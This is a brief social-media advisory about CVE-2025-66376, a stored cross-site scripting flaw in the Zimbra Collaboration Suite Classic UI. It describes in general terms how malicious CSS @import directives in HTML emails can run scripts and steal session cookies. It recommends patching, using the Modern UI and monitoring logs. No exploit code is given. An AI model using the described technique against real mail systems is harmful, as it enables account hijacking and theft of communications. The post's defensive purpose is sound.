Your corporate email is being targeted through malicious CSS @import directives. 🐚
CVE-2025-66376 · Severity 7.2 · Active Stored XSS in Zimbra Collaboration Suite.
The @[CISA]\\(urn:li:organization:13010360\\) has added a stored cross-site scripting ❨XSS❩ vulnerability in the Zimbra Classic UI to its Known Exploited Vulnerabilities catalog. Attackers are abusing CSS @import directives in HTML emails to execute malicious scripts in the context of the user session.
This allows threat actors to steal session cookies‚ hijack email accounts‚ and exfiltrate sensitive communications. This vulnerability has been observed in targeted campaigns against government agencies and research institutions throughout early 2026.
The uncomfortable truth: A single malicious email can compromise your entire executive communication history if your mail platform fails to neutralize complex styling directives.
→ Update Synacor Zimbra Collaboration Suite to version 9.0.0 P41‚ 10.0.9‚ or 10.1.1 immediately.
→ Instruct users to utilize the Modern UI where possible‚ as the vulnerability primarily impacts the Classic UI.
→ Monitor mail server logs for anomalous outbound traffic originating from webmail user sessions.
#Cybersecurity #EmailSecurity #Zimbra #VulnerabilityManagement #SOC #CodeDefence